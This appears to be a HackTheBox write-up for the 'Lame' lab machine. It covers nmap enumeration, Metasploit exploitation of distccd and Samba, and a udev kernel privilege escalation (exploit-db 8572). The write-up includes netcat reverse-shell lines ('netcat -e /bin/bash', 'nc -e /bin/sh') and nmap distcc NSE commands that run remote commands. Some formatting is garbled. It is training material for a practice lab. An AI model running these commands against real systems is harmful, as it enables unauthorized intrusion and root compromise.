HackTheBox - Lame write-up

Share on:

This is an Easy box from HTB Labs. Lame is running multiple vulnerable services through which you can get access to the system. Lets start cracking!!!

Nmap Scanning Results

sudo map -sV -A PORT | Status | SERVICE | VERSION ——|——–|———|——– 21/tcp|open | ftp |vsftpd 2.3.4 ftp-anon: Anonymous FTP login allowed (FTP code 230) 22/tcp     open ssh      OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 139/tcp      open netbios-ssn     Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp      open netbios-ssn     Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 3632/tcp      open distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Host script results: | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | NetBIOS computer name: |_ Workgroup: WORKGROUP\x00

Exploit Searching

So theres is distccd 4.2.4, samba 3.0.20 service are running on the remote machine. After a quick search on Metasploit and Google found that both the services were vulnerble with public exploit available.

URL: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script

Exploitation (with Metasploit)



I was curious about this service from the start and wanted to dig more. distccd module is also available in metasploit so lets exploit. It worked but we got a limited shell meaning we are in as a daemon service not as root user/ standard user. Lets find a way to Privilege Escalate it.

Privilege Escalation

uname -a</b> to find out the linux kernel and os version running on the machine. Remote server kernel running foudn to be vulnerable - linux 2.6.24-16-server

Now Download the Exploit to the local machine : COMMAND: wget http://www.exploit-db.com/download/8572 Move to “/var/www/html” and change permission. Open Apache web server on your local atacking machine COMMAND: service apache2 start Download exploit in remote machine /tmp folder and compile 8572.c COMMAND: gcc 8572.c -o exploit Now we need Create file “run” in tmp file as the exploit executes “run” file. COMMANDS: echo ‘#!/bin/bash’ > run echo ‘/bin/netcat -e /bin/bash 1234’ » run

Execute below to find pid of udevd COMMAND: cat /proc/net/netlink Start listener on local machine And execute exploit with pid of udevd. Got r00t!!!!

To test first we run COMMAND: nmap -p 3632 –script distcc-cve2004-2687.nse –script-args="distcc-cve2004-2687.cmd='id’” We got the uid and gid info back meaning this script is working. now we can go ahead and get root shell.

COMMAND: nmap -p 3632 –script distcc-cve2004-2687.nse –script-args="distcc-cve2004-2687.cmd='nc -e /bin/sh 1234’” Now grab the flags.This was an easy and privilege escalation part was the interesting bit here.